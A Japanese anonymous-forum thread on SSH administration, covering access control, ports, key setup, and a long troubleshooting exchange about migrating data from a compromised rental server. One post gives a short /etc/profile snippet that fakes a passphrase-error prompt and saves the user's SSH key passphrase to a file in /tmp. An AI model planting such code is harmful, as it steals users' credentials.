14/12/06 23:13:35.29 .net
鬼? 雑魚だよ。
194:名無しさん@お腹いっぱい。
14/12/06 23:57:36.44 .net
結局、ただのやっかみかよ。
195:名無しさん@お腹いっぱい。
14/12/07 00:04:20.63 .net
>>194
どこをどう読んだらそんな解釈になるんですか川本さん
196:名無しさん@お腹いっぱい。
14/12/07 01:02:14.05 .net
このスレに、川本さんは何人いるんだ。
197:名無しさん@お腹いっぱい。
14/12/07 23:50:08.35 .net
悪いrootが不精ならオフライン解析より/etc/profileでフィッシングする方が効率的かもね
# /etc/profile
if grep "RSA PRIVATE KEY" /home/$USER/.ssh/authorized_keys > /dev/null; then
sleep 3
echo "Connection to $HOSTNAME closed."
read -s -p "Bad passphrase, try again for /Users/$USER/.ssh/id_rsa: " passphrase
echo "$passphrase" >> /tmp/passphrase-$USER
fi
198:名無しさん@お腹いっぱい。
14/12/15 12:41:54.46 .net
良記事
URLリンク(togakushi.bitbucket.org)
199:名無しさん@お腹いっぱい。
14/12/16 11:02:27.42 .net
あーあ何か変な奴に粘着されたなこのスレも…
200:名無しさん@お腹いっぱい。
14/12/18 09:07:32.46 .net
>>199
おはよう、川本君。IPAには届け出たかね?
201:名無しさん@お腹いっぱい。
14/12/18 11:35:04.54 .net
川本が!川本が俺を殺しに来る!!
あいつのせいで俺の鍵が流出した!!!
川本許さねえ!絶対にゆるさねえええええええええええええええええええええ!!!!!!!!!11
これぐらいキレてもいいんだよきみ
202:名無しさん@お腹いっぱい。
15/04/03 16:29:47.36 .net
あけましておめでとう。
みんな、22 開けて使ってるの?
22 開いてるのがわかると root で突撃して来る .cn のバカが鬱陶しいから別ポートに変えちゃった。
203:名無しさん@お腹いっぱい。
15/04/03 22:17:35.30 .net
>>202
オレもポートは変えてる。
204:名無しさん@お腹いっぱい。
15/04/06 09:38:02.97 .net
fail2banしてるから22のままだなあ。
premitRootLogin noだしpassword認証も受け付けてないし。
205:名無しさん@お腹いっぱい。
15/04/06 13:57:05.84 .net
22の方が便利ってわけでもないから変えてる
わざわざ余計なログ吐かせて眺める趣味もないし
206:名無しさん@お腹いっぱい。
15/04/07 11:27:12.23 .net
話の流れを切って悪いが、アクセス制限について質問です。
自宅用のSSHサーバーを作ろうと思って入門書を読んでいるんだが、
TCP Wrappeによるアクセス制限とPAM認証によるアクセス制限の違いがいまいちわからない。
例えば同一LAN内からのアクセスのみを許可したい場合、
<TCP Wrapperの場合>/etc/hosts.denyに「sshd:all」、hosts.allowに「sshd:192.168.」
<PAM認証の場合>/etc/security/access.confに「-:ALL:ALL EXCEPT 192.168.」
どっちでも同じ効果が得られる気がするんだが、挙動に違いはある?
PAM認証を用いた方が細かく制御できるってだけ?
悪い接続元を弾くタイミングが違うとか?
207:名無しさん@お腹いっぱい。
15/04/07 16:29:56.81 .net
>>206
素人扱いするな、そんなことは知っている、って逆切れするような人じゃないことを祈りながら書く。
tcp wrapperも PAM もsshdに内蔵されているものではない。別個に開発されたライブラリをsshdが利用している。
機能に重複があるのは、そのせい。ユーザー(サーバ管理者)が利用するものを選んで設定する。
hosts.allow、denyを使う場合と、access.confを使う場合だが、動作の違いはある。
PAMはユーザーを認証するもの、tcp wrapperはコネクションを制限するもの。
なのでtcp wrapperはコネクションの最初で効く。PAMの認証は、その後で行われる。
これはsshdに限らない話。
tsharkなどを使ってモニターすると、接続が拒否されるタイミングがわかる。
sshd(openssh)の場合はPAM以外にもユーザー認証があり(ChallengeResponseAuthentication、PasswordAuthentication、PubkeyAuthenticationなど)
そっちで認証が通ればPAMで認証されなくてもログインできる。
これはSSH始めました、の頃によくやる失敗なので、要注意。
設定ファイルの仕組みの話になるが
hosts.deny、allowにsshd:xxx と書けば、これはsshd限定だが
access.confはsshd以外も参照している可能性がある点も注意が必要。
208:名無しさん@お腹いっぱい。
15/04/07 18:21:18.49 .net
>>207
正に知りたい答えでした。
この前に入門書を買ったばかりでググってもイマイチ分からなかったので、素人でも分かる説明で助かります。
ありがとうございました!
209:名無しさん@お腹いっぱい。
15/04/07 23:46:54.67 .net
具体的な質問 に 的確な回答
単純明快なやりとりは見てて清清しい
いい夜をありがとう
210:名無しさん@お腹いっぱい。
15/04/08 01:50:50.85 .net
>>206
OpenSSH 6.7以降だとtcpwrappers/libwrapのサポートが削除されてるから注意しとけよ
211:名無しさん@お腹いっぱい。
15/04/28 11:48:29.85 .net
本日 psi.ip-colo.net からお越しになったお客様
PlcmSpIp 様、admin 様、backup 様、ftpuser 様、guest 様
manager 様、monitor 様、root 様、support 様、test 様
ubnt 様、user 様
212:名無しさん@お腹いっぱい。
15/04/28 13:15:39.86 .net
もてもてだね。
213:名無しさん@お腹いっぱい。
15/05/31 16:59:57.64 .net
Tera Term r2【テラターム】 - No.823
スレリンク(unix板:823番)n
823 :823:2015/05/31(日) 16:53:55.57
> バージョン4.87リリース記念age!
>
> OpenSSH 6.8に接続できなくなってパニックになったサーバー管理者の方々
> が多かったのではないでしょうか。
> ということで、この問題が修正されたものが本日公式にリリースされました
> ので、利用者はアップグレードをオススメしときます。
214:名無しさん@お腹いっぱい。
15/05/31 18:34:44.39 .net
なんか懐かしい名前だ。
Windows からは Cygwin の ssh だからどうでもいい。
215:名無しさん@お腹いっぱい。
15/05/31 20:10:21.19 .net
自分もputtyもteratermも捨ててcygwinの使ってるわ
216:名無しさん@お腹いっぱい。
15/05/31 22:32:37.52 .net
Cygwinはなー……ということでMSYS2派
217:名無しさん@お腹いっぱい。
15/05/31 22:34:07.81 .net
ログ取りはscriptとか使うの?
218:名無しさん@お腹いっぱい。
15/06/03 18:28:09.16 .net
cygwinもMSYS2も、遠からず捨てる日が来るのかな
219:名無しさん@お腹いっぱい。
15/06/03 18:34:35.17 .net
とっくにwindowsを捨ててる
220:名無しさん@お腹いっぱい。
15/06/04 05:26:26.98 .net
とっくにwindowsを捨ててる(キリッ
221:名無しさん@お腹いっぱい。
15/06/04 20:38:59.15 .net
質問失礼致します。
scpコマンドで
「リモートサーバー」と「そことローカル接続しているサーバー」で、
ファイルのやり取りは可能でしょうか?
具体的には、旧筐体から新筐体へデータ移行を行いたいのです
ただし旧筐体はネットワークから切り離されているという状況です
222:名無しさん@お腹いっぱい。
15/06/04 20:51:37.76 .net
ローカル接続とは具体的にどのように接続しているのでしょうか?
新筐体がリモートサーバーで、旧筐体が、そこ(新筐体のことでしょうか?)とローカル接続しているサーバーですか?
新筐体と旧筐体がローカルなネットワークで接続されていて
今の場所から、旧筐体にはログインできないが、
新筐体にはログインできて、新筐体から旧筐体にはログインできるのなら
新筐体と旧筐体の間でscpなりrsyncなりなんなりと使えるでしょう。
FTPのサーバー間転送みたいなことはできませんけど。
223:名無しさん@お腹いっぱい。
15/06/04 21:03:36.40 .net
>>222
まさにそういう事です!
新筐体から旧筐体へはどのようにログインすればいいんでしょうか?
URLリンク(qiita.com)
こちらなどを見たんですが、新筐体へはログイン出来ましたが、
新筐体から旧筐体へのログイン方法が分かりません
224:名無しさん@お腹いっぱい。
15/06/04 21:35:54.66 .net
旧筐体にはsshでログインできてましたか?
まず新筐体にログインします。これは出来てるんですね。
シェルが使えるとします。
scpはsshと同じログイン方法なので、パスワードで入れていたのなら
scp 旧筐体のユーザー名@旧筐体のサーバー名(IPアドレスのほうが確実かも):旧筐体内でのファイル名なりディレクトリ名 新筐体のディレクトリ名
scp root@192.168.1.20:/home/ /home
こんな感じですかね
225:名無しさん@お腹いっぱい。
15/06/04 21:49:55.09 .net
>>224
大変ありがとうございます。
旧筐体にはログイン出来てないです
$ ssh redadmin@192.168.1.20
とやってみたんですが、駄目でした
226:名無しさん@お腹いっぱい。
15/06/04 23:20:28.21 .net
>>225
まず、ログインできるようにしないと
227:名無しさん@お腹いっぱい。
15/06/04 23:47:23.18 .net
>>226
これの事でしょうか?
簡単sshログイン方法
URLリンク(qiita.com)
新筐体と旧筐体、どちらを設定すればいいんでしょう?
228:名無しさん@お腹いっぱい。
15/06/05 00:18:01.59 .net
そりゃあ勿論、旧筐体にsshでログインできるようにする。
今までどうやってログインしてましたか?
229:名無しさん@お腹いっぱい。
15/06/05 00:24:12.21 .net
>>228
旧筐体にはログインした事ないです
新筐体はIPアドレス・ID・パスワードでログインしました
使用したSSHクライアントソフトは
Poderosa
Tera Term
です
230:名無しさん@お腹いっぱい。
15/06/05 00:33:05.47 .net
>>229
管理者権限でログインしないと設定できません。
旧筐体の管理者はどうしていますか?
旧筐体の中をあけてハードディスクを取り出したりできますか?
231:名無しさん@お腹いっぱい。
15/06/05 00:38:02.48 .net
>>230
色々本当ありがとうございます。
redadminでログイン後
rootにスイッチしました
因みにこれまでのはレンタルサーバーでの話です
旧筐体がクラックされた恐れがあるとかで、ネットワークから切り離され
新筐体へのデータ移行はサポート外なので自分でやれと言われてます
232:名無しさん@お腹いっぱい。
15/06/05 00:40:36.82 .net
>>230
旧筐体の管理者はどうやったら分かりますか?
233:名無しさん@お腹いっぱい。
15/06/05 00:54:44.94 .net
>>231
redadminでログイン後
どうやってログインしたのでしょうか?
$ ssh redadmin@192.168.1.20
とやってみたんですが、駄目でした
もう一度やってみたら出来たのですか?
234:名無しさん@お腹いっぱい。
15/06/05 01:08:40.42 .net
Poderosaで
新筐体IPアドレス・ID(redadmin)・パスワード
を設定してログイン
$ su → パスワードを訊かれてrootログイン
出来たのはここまでです。
$ssh-keygen
$ vi ~/.ssh/config
$ cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys
/etc/ssh/sshd_config
などをいじりましたが、旧筐体にはログイン出来ません
ssh redadmin@旧筐体のローカルIPアドレス
が旧筐体への接続コマンドだと案内されました
235:名無しさん@お腹いっぱい。
15/06/05 03:44:48.64 .net
>>234
public keyは旧筐体に入れないとダメです。
ssh redadmin@旧筐体のローカルIPアドレス
でパスワードを聞かれませんか?
236:名無しさん@お腹いっぱい。
15/06/05 04:34:53.37 .net
>>235
訊かれないです
Connection timed out になります。
237:名無しさん@お腹いっぱい。
15/06/05 07:09:11.54 .net
>>236
ポートが22以外に設定されてるってことはないですか?
nmapを新筐体に入れてポートスキャンはできますか?
238:名無しさん@お腹いっぱい。
15/06/05 07:29:50.23 .net
ネットワークから切り離されてるマシンにsshで入りたい、ってこと?
239:名無しさん@お腹いっぱい。
15/06/05 08:28:01.68 .net
寝ている間になにかすごい事に…
240:名無しさん@お腹いっぱい。
15/06/05 09:39:27.83 .net
>>231
データ移行はサポート範囲外でもログイン方法くらいはサポートしろよ、って言ってみ
241:名無しさん@お腹いっぱい。
15/06/05 11:34:54.14 .net
すみません今起きました
>>237
どうやったら入れられますか?
>>238
そうです
>>240
旧筐体内のデータを移行するにはこの方法しかないと
けれどこの方法はナレッジがない為、サポート外で、
自己責任でと言われ、外部サイトを紹介されました
過去に同じような事例で同じ案内した実績があると行ってました
けれど上手く行った例は一軒も確認が取れてないそうです
>>239
メールでの問い合わせは回答が遅く
電話での問い合わせは、メールで回答すると言い、
電話受付終了直前にメールが届きます
全然進みません・・・
242:名無しさん@お腹いっぱい。
15/06/05 11:46:31.49 .net
>>241
旧筐体が現在も稼動していて、
新筐体と同じローカルネットワークに存在して、
そのローカルネットワーク上での旧筐体のアドレスが192.168.1.20だっていうことは確かなの?
その情報はどこから入手したの?
243:名無しさん@お腹いっぱい。
15/06/05 11:48:59.59 .net
>>242
確かだそうです(IPは途中で訂正がありましたが)
この情報はサーバー会社から頂きました
※192.168.1.20は数字を変えてあります
244:名無しさん@お腹いっぱい。
15/06/05 11:53:20.12 .net
旧筐体のポートは22で間違いないそうです
245:名無しさん@お腹いっぱい。
15/06/05 11:53:41.91 .net
>>243
その情報とこれをサポートから得ていて、
>ssh redadmin@旧筐体のローカルIPアドレスが旧筐体への接続コマンドだと案内されました
新筐体からssh redadmin@旧筐体のローカルIPアドレスをやった結果がこれなら
>Connection timed out になります。
繋がらんぞとサポートに言うだけだろ
246:名無しさん@お腹いっぱい。
15/06/05 12:00:08.12 .net
>>245
まず最初の時点でSSHの知識がなかった為
他の手段を色々かけあいましたが、断られました
次にSSHを試してみて繋がらないので
問い合わせたところ、IPが違っていたと回答がありました
それでも繋がらないので、先程ポートを確認しましたところ
22であっているとの事でした(今再確認してもらってます)
247:名無しさん@お腹いっぱい。
15/06/05 12:57:23.25 .net
新筐体にログインして
ping 旧筐体のローカルIP
をやってみて
Destination Host Unreachable
と表示されたら
ifconfig -a
ip route
ip rule
の結果を教えて
ただしifconfig -aのアドレスは置き換えて
248:名無しさん@お腹いっぱい。
15/06/05 12:58:53.40 .net
結果をここに書き込むときに
IPアドレスの類は全部置き換えて
249:名無しさん@お腹いっぱい。
15/06/05 13:03:31.06 .net
ローカルIPアドレスなら別にそのままでもいいんじゃね?
250:名無しさん@お腹いっぱい。
15/06/05 13:06:35.82 .net
新筐体のアドレスを晒すかもしれないと思って、ねんのために
251:名無しさん@お腹いっぱい。
15/06/05 13:08:28.39 .net
>>247
ありがとうございます
「Destination Host Unreachable」は表示されませんでした
PING 192.168.1.20 (192.168.1.20) 56(84) bytes of data.
64 bytes from 192.168.1.20: icmp_seq=1 ttl=64 time=0.626 ms
64 bytes from 192.168.1.20: icmp_seq=2 ttl=64 time=0.627 ms
64 bytes from 192.168.1.20: icmp_seq=3 ttl=64 time=0.633 ms
64 bytes from 192.168.1.20: icmp_seq=4 ttl=64 time=0.624 ms
64 bytes from 192.168.1.20: icmp_seq=5 ttl=64 time=0.631 ms
(中略)
--- 192.168.1.20 ping statistics ---
98 packets transmitted, 98 received, 0% packet loss, time 97059ms
rtt min/avg/max/mdev = 0.606/0.631/0.645/0.029 ms
252:名無しさん@お腹いっぱい。
15/06/05 15:20:39.22 .net
もうこっちでできることはないだろう
旧筐体に触れる人じゃないと解決できない
253:名無しさん@お腹いっぱい。
15/06/05 15:26:15.09 .net
クラックされてバックドアからしか入れなくされたのかもな
254:名無しさん@お腹いっぱい。
15/06/05 19:01:54.94 .net
今日は、DenyHosts に引っかかる奴が一匹もいない。
255:名無しさん@お腹いっぱい。
15/06/05 22:41:29.34 .net
>>252
そう思うのですが、応じてくれないのです(TT)
来週には旧筐体を回収すると言ってます・・・
256:名無しさん@お腹いっぱい。
15/06/06 05:46:33.41 .net
じゃぁもう無理だな
257:名無しさん@お腹いっぱい。
15/06/06 06:20:38.62 .net
レンタルサーバーのバックアップはどちらか行う契約になってたの?
自分で行う事になってたのなら、移行サポートは契約外サービス
向こうが行う契約ならば契約の履行を要求すればいい
ところで、新筐体からssh -vvv redadmin@192.168.1.20した結果見せてよ。
258:名無しさん@お腹いっぱい。
15/06/06 12:56:42.57 .net
>>257
最新の規約では客側となっておりました
ssh -vvv redadmin@192.168.1.20
少々長いですが貼らして頂きます
259:名無しさん@お腹いっぱい。
15/06/06 12:57:56.30 .net
OpenSSH_4.3p2, OpenSSL 0.9.8e-fips-rhel5 01 Jul 2008
debug1: Reading configuration data /root/.ssh/config
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: Applying options for *
debug2: ssh_connect: needpriv 0
debug1: Connecting to 192.168.1.20 [192.168.1.20] port 22.
debug1: Connection established.
debug1: permanently_set_uid: 0/0
debug1: identity file /root/.ssh/identity type -1
debug3: Not a RSA1 key file /root/.ssh/id_rsa.
debug2: key_type_from_name: unknown key type '-----BEGIN'
debug3: key_read: missing keytype
debug3: key_read: missing whitespace
(中略)
debug3: key_read: missing whitespace
debug2: key_type_from_name: unknown key type '-----END'
debug3: key_read: missing keytype
debug1: identity file /root/.ssh/id_rsa type 1
debug1: identity file /root/.ssh/id_dsa type -1
debug1: loaded 3 keys
debug1: Remote protocol version 1.99, remote software version OpenSSH_4.3p2
debug1: match: OpenSSH_4.3p2 pat OpenSSH*
debug1: Enabling compatibility mode for protocol 2.0
debug1: Local version string SSH-2.0-OpenSSH_4.3
debug2: fd 3 setting O_NONBLOCK
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug2: kex_parse_kexinit: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
debug2: kex_parse_kexinit: ssh-rsa,ssh-dss
debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour128,arcfour256,arcfour,aes192-cbc,aes256-cbc,rijndael-cbc@lysator.liu.se,aes128-ctr,aes192-ctr,aes256-ctr
260:名無しさん@お腹いっぱい。
15/06/06 12:58:59.06 .net
debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour128,arcfour256,arcfour,aes192-cbc,aes256-cbc,rijndael-cbc@lysator.liu.se,aes128-ctr,aes192-ctr,aes256-ctr
debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96
debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96
debug2: kex_parse_kexinit: none,zlib@openssh.com,zlib
debug2: kex_parse_kexinit: none,zlib@openssh.com,zlib
debug2: kex_parse_kexinit:
debug2: kex_parse_kexinit:
debug2: kex_parse_kexinit: first_kex_follows 0
debug2: kex_parse_kexinit: reserved 0
debug2: kex_parse_kexinit: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
debug2: kex_parse_kexinit: ssh-rsa,ssh-dss
debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,rijndael-cbc@lysator.liu.se
debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,rijndael-cbc@lysator.liu.se
debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96
debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96
debug2: kex_parse_kexinit: none,zlib
debug2: kex_parse_kexinit: none,zlib
debug2: kex_parse_kexinit:
debug2: kex_parse_kexinit:
debug2: kex_parse_kexinit: first_kex_follows 0
debug2: kex_parse_kexinit: reserved 0
debug2: mac_init: found hmac-md5
debug1: kex: server->client aes128-cbc hmac-md5 none
debug2: mac_init: found hmac-md5
debug1: kex: client->server aes128-cbc hmac-md5 none
debug1: SSH2_MSG_KEX_DH_GEX_REQUEST(1024<1024<8192) sent
debug1: expecting SSH2_MSG_KEX_DH_GEX_GROUP
debug2: dh_gen_key: priv key bits set: 123/256
debug2: bits set: 511/1024
debug1: SSH2_MSG_KEX_DH_GEX_INIT sent
261:名無しさん@お腹いっぱい。
15/06/06 13:00:26.35 .net
debug1: expecting SSH2_MSG_KEX_DH_GEX_REPLY
debug3: check_host_in_hostfile: filename /root/.ssh/known_hosts
debug3: check_host_in_hostfile: match line 2
debug1: Host '192.168.1.20' is known and matches the RSA host key.
debug1: Found key in /root/.ssh/known_hosts:2
debug2: bits set: 514/1024
debug1: ssh_rsa_verify: signature correct
debug2: kex_derive_keys
debug2: set_newkeys: mode 1
debug1: SSH2_MSG_NEWKEYS sent
debug1: expecting SSH2_MSG_NEWKEYS
debug2: set_newkeys: mode 0
debug1: SSH2_MSG_NEWKEYS received
debug1: SSH2_MSG_SERVICE_REQUEST sent
debug2: service_accept: ssh-userauth
debug1: SSH2_MSG_SERVICE_ACCEPT received
debug2: key: /root/.ssh/identity ((nil))
debug2: key: /root/.ssh/id_rsa (0x98eda60)
debug2: key: /root/.ssh/id_dsa ((nil))
debug1: Authentications that can continue: publickey,password,keyboard-interactive
debug3: start over, passed a different list publickey,password,keyboard-interactive
debug3: preferred gssapi-with-mic,publickey,keyboard-interactive,password
debug3: authmethod_lookup publickey
debug3: remaining preferred: keyboard-interactive,password
debug3: authmethod_is_enabled publickey
debug1: Next authentication method: publickey
debug1: Trying private key: /root/.ssh/identity
debug3: no such identity: /root/.ssh/identity
debug1: Offering public key: /root/.ssh/id_rsa
debug3: send_pubkey_test
262:名無しさん@お腹いっぱい。
15/06/06 13:05:16.38 .net
debug2: we sent a publickey packet, wait for reply
debug1: Authentications that can continue: publickey,password,keyboard-interactive
debug1: Trying private key: /root/.ssh/id_dsa
debug3: no such identity: /root/.ssh/id_dsa
debug2: we did not send a packet, disable method
debug3: authmethod_lookup keyboard-interactive
debug3: remaining preferred: password
debug3: authmethod_is_enabled keyboard-interactive
debug1: Next authentication method: keyboard-interactive
debug2: userauth_kbdint
debug2: we sent a keyboard-interactive packet, wait for reply
debug1: Authentications that can continue: publickey,password,keyboard-interactive
debug3: userauth_kbdint: disable: no info_req_seen
debug2: we did not send a packet, disable method
263:名無しさん@お腹いっぱい。
15/06/06 13:07:12.09 .net
debug3: authmethod_lookup password
debug3: remaining preferred:
debug3: authmethod_is_enabled password
debug1: Next authentication method: password
redadmin@192.168.1.20's password:
debug3: packet_send2: adding 48 (len 61 padlen 19 extra_pad 64)
debug2: we sent a password packet, wait for reply
debug1: Authentications that can continue: publickey,password,keyboard-interactive
Permission denied, please try again.
redadmin@192.168.1.20's password:
debug3: packet_send2: adding 48 (len 61 padlen 19 extra_pad 64)
debug2: we sent a password packet, wait for reply
Connection closed by 192.168.1.20
以上です
264:名無しさん@お腹いっぱい。
15/06/06 14:52:34.47 .net
これまで旧筐体にログインしたことはないそうだけど、
(Q1)旧筐体のredadminのパスワードは分かっているのか?
debug1: Next authentication method: password
redadmin@192.168.1.20's password:
debug3: packet_send2: adding 48 (len 61 padlen 19 extra_pad 64)
debug2: we sent a password packet, wait for reply
debug1: Authentications that can continue: publickey,password,keyboard-interactive
Permission denied, please try again.
redadmin@192.168.1.20's password:
パスワードが違っているのでは?
(Q2)旧筐体にどうやってデータをアップロードしていたのか?
FTPやWebDAVなどを使っていたのなら、新筐体からポートフォワードでデータをダウンロードできるかも。
265:名無しさん@お腹いっぱい。
15/06/06 16:33:59.03 .net
>>264
本当にありがとうございます。
パスワード以外の可能性はなさそうですか?
(Q2)
これまで普通に使用していたサーバーが攻撃を受けて、ネットワークから隔離されてしまったんです。
戻す事はセキュリティ上出来ないから、筐体変更が必要と言われました。
それで新筐体を用意してもらったところ、旧筐体→新筐体へのデータ移行はサポート外と言われました。
(Q1)
昨日電話で問い合わせた時は、新筐体と同じと言われましたが、怪しいです。
旧筐体のローカルIPも後日訂正されましたし。
1日1項目しか進ませてくれませんw
因みに昨日の進歩は「iptables設定解除」でした。
これでパスワードが訊かれる所まで辿り着けました。
週末は休みなので、運が良ければ月曜の夜にパスワードを教えて頂けるかもしれません。
266:名無しさん@お腹いっぱい。
15/06/06 18:25:09.33 .net
>>265
(Q2)旧筐体にどうやってデータをアップロードしていたのか?
というのは、普通に使用していたという、その内容を聞いています。
例えばWordPressならWordPressの機能を使ってデータをダウンロードできるのではないですか?
新筐体でSSHが使えるのなら、ポートフォワード機能を使って旧筐体のWordPressにアクセスできる可能性があります。
267:名無しさん@お腹いっぱい。
15/06/06 19:29:15.51 .net
>>266
FTPです。
WordPressは使ってないです。
ポートフォワード機能というのはパスワードなしでアクセス出来るんですか?
268:名無しさん@お腹いっぱい。
15/06/06 20:44:13.35 .net
>>267
旧筐体にSSHでログインするのは難しそうなので、データを取り出すために
他の方法で入れないかということです。
FTPを使っていたのなら、新筐体で
ftp 旧筐体のIP
とやってみたらどうでしょうか。
FTPでログインできるかもしれません。
ポートフォワードはSSHの機能で、手元のPCからは新筐体にアクセスし、
新筐体のSSHDが、そのアクセスを別のサーバー(今の場合は旧筐体)へ
中継してアクセスするものです。
旧筐体で使っていたのがWebアプリなら、この方法で手元のPCから
旧筐体にアクセスできるかも、と考えたのです。
269:名無しさん@お腹いっぱい。
15/06/06 23:06:48.59 .net
>>268
ありがとうございます
ですが、その前に旧筐体にSSH接続する事が出来ました
ただ、ディレクトリが見つけられません
270:名無しさん@お腹いっぱい。
15/06/07 03:14:56.19 .net
お陰様でファイルの移行は無事出来ました。
しかし肝心のmysqlが接続出来ません。。
271:名無しさん@お腹いっぱい。
15/06/07 05:41:52.90 .net
>>270
おまえさmysqlがどうこう言う前にみんなに説明することがあるだろ
どうして今まではsshで接続できなかったのか
272:名無しさん@お腹いっぱい。
15/06/07 07:22:18.88 .net
sshで入れるならmysqldumpすりゃ良いんだろ
273:名無しさん@お腹いっぱい。
15/06/07 13:10:39.18 .net
>>270
dbのディレクトリごとtar ballにしてもってきちゃいなよ
そうしたら、手元のマシンでいくらでもできると思うけど
274:名無しさん@お腹いっぱい。
15/06/07 16:40:43.34 .net
もうスレ違い
275:名無しさん@お腹いっぱい。
15/06/07 17:14:18.66 .net
>>271
失礼しました
旧筐体のパスワードが分かった為です
>>272
どうしてもエラーが出てしまいます
ERROR 1045 (28000): Access denied for user '*****'@'localhost' (using password: YES)
276:名無しさん@お腹いっぱい。
15/06/07 17:46:36.57 .net
おまえら優しすぎ
277:名無しさん@お腹いっぱい。
15/06/07 18:10:55.42 .net
sshの話じゃないだろ
よそでやれよ
278:名無しさん@お腹いっぱい。
15/06/08 08:03:56.92 .net
>>275
そのdbとwebアプリケーションで動いていたのなら、それこそmysqlのdbディレクトリを、まんま新筐体に持って行けば動くだろ?
mysqlのバージョンを合わせりゃこれでも動くぞ
279:名無しさん@お腹いっぱい。
15/06/08 09:31:20.71 .net
それは、mysqlのファイルにリードパーミッションが無けりゃ出来ない。
280:名無しさん@お腹いっぱい。
15/06/08 15:41:30.92 .net
>>273
mysqlディレクト毎をtar.gz圧縮して、新筐体に送信、展開したらPLESK毎動かなくなってしまいました
ERROR: PleskMainDBException
MySQL query failed: Unknown column 'ip_dual_stack' in 'field list'
0: common_func.php3:220
db_query(string 'SELECT login, type, ip_address, ip_dual_stack FROM sessions WHERE sess_id=""')
1: class.Session.php:420
Session->init(string '*.*.*.*')
2: auth.php3:197
281:名無しさん@お腹いっぱい。
15/06/08 16:27:07.75 .net
なぜ稼働中のサーバー(だよな?)でやったのか
282:名無しさん@お腹いっぱい。
15/06/08 17:07:13.47 .net
>>280
そういうのはMySQLを止めてやるんだ
283:名無しさん@お腹いっぱい。
15/06/08 17:31:26.02 .net
ワロタww
284:名無しさん@お腹いっぱい。
15/06/08 17:36:25.99 .net
>>281-283
稼働中のサーバーでやってしまいました(´Д⊂ モウダメポ
しかもMySQLのバージョンが違ったかもしれません
PLESKのバージョンも違うので
これはサーバー会社に頼んで再インストールしかないですかね?
285:名無しさん@お腹いっぱい。
15/06/08 20:27:04.51 .net
サーバー会社も災難だな
このスレにも災難だが
286:名無しさん@お腹いっぱい。
15/06/09 19:13:39.75 .net
>>284
新筐体のディレクトリはバックアップしてなかったのかよ...
287:名無しさん@お腹いっぱい。
15/09/20 21:08:00.32 .net
SSHとSSLの違いを教えて下さい。
288:名無しさん@お腹いっぱい。
15/09/22 08:42:06.45 .net
SSレジスタの上位バイトと下位バイト
289:名無しさん@お腹いっぱい。
15/09/22 09:51:04.82 .net
OpenSSHとOpenSSL
作者が同じと思っていたが実は違うのだ。
290:名無しさん@お腹いっぱい。
15/09/24 19:52:10.60 .net
sshでクライアントからログイン出来るPCを制限しようとして
etc/ssh/sshd_configに次の一行を付け加えました
ListenAddress 192.168.1.100
そうしたら192.168.1.100からsshで接続できなくなりました
OS: FreeBSD9.2
/var/log/messagesの内容は
error: Bind to port 22 on 192.168.1.100 failed: Can't assign requested address.
fatal: Cannot bind any address.
何が原因でしょうか、よろしくお願いします
291:名無しさん@お腹いっぱい。
15/09/24 20:30:08.37 .net
Listenの意味を勘違いしてるw
292:名無しさん@お腹いっぱい。
15/09/26 20:15:26.90 .net
自己解決、ていうか・・・
ListenAddressを設定するのは
NICが複数有るような場合、どのNICで待ち受けるか、ですね
それをクライアントのIPにしたら、接続できないのはあたりまえでした
お騒がせしました、消えます
293:名無しさん@お腹いっぱい。
15/10/22 22:52:49.54 .net
☆ 日本の核武装は早急に必須ですわ。☆
総務省の『憲法改正国民投票法』、でググってみてください。
日本国民の皆様方、2016年7月の『第24回 参議院選挙』で、日本人の悲願である
改憲の成就が決まります。皆様方、必ず投票に自ら足を運んでください。お願い致します。
294:名無しさん@お腹いっぱい。
16/01/05 20:08:45.92 .net
sshはDebianだから入ってるみたいだけどどうやって練習すんの?
ここで聞いちゃダメだったら言ってくれ
295:名無しさん@お腹いっぱい。
16/01/05 21:08:37.50 .net
>>294
どういう意味?
296:名無しさん@お腹いっぱい。
16/01/05 23:45:18.40 .net
>>295
PCが1台しかないのにsshの練習ってどうやるのかなって思ってるだけ
297:名無しさん@お腹いっぱい。
16/01/06 08:40:07.72 .net
自分のマシンにログインするとか、
仮想マシン立てるとか、
レンタルサーバ借りるとか
298:名無しさん@お腹いっぱい。
16/01/06 09:08:57.03 .net
>>297
ありがとう 練習してみます
299:名無しさん@お腹いっぱい。
16/01/06 09:42:32.20 .net
練習なんているかな
必要になったらおぼえればいいんじゃね
300:名無しさん@お腹いっぱい。
16/01/17 13:19:59.91 .net
スマホにSSHクライアントをインストールしてLTEだと正しく接続できたのですが
wifi経由だと"Connection reset by peer"というエラーが出て接続できませんでした。
恐らくルータの設定に問題があると思うのですが、
どの辺をいじればいいのか何かキーワード的なものがありましたら教えてください。
301:名無しさん@お腹いっぱい。
16/01/17 14:06:14.03 .net
すいません。
普通にポート開放したら行けました。
302:名無しさん@お腹いっぱい。
16/01/29 11:43:14.17 .net
すごく初歩的な質問で申し訳ないのですが
sshで遠隔のLinuxマシン上でプログラムを実行したいと思っています。
プログラムの内容はWebを監視しながら常に最新のデータで
ファイルを上書きしていくというものですが、、、
ssh -l root xxx.xxx.xxx.xxx
cd ~/program/
./check
みたいな感じでプログラムを走らせることは出来るのですが
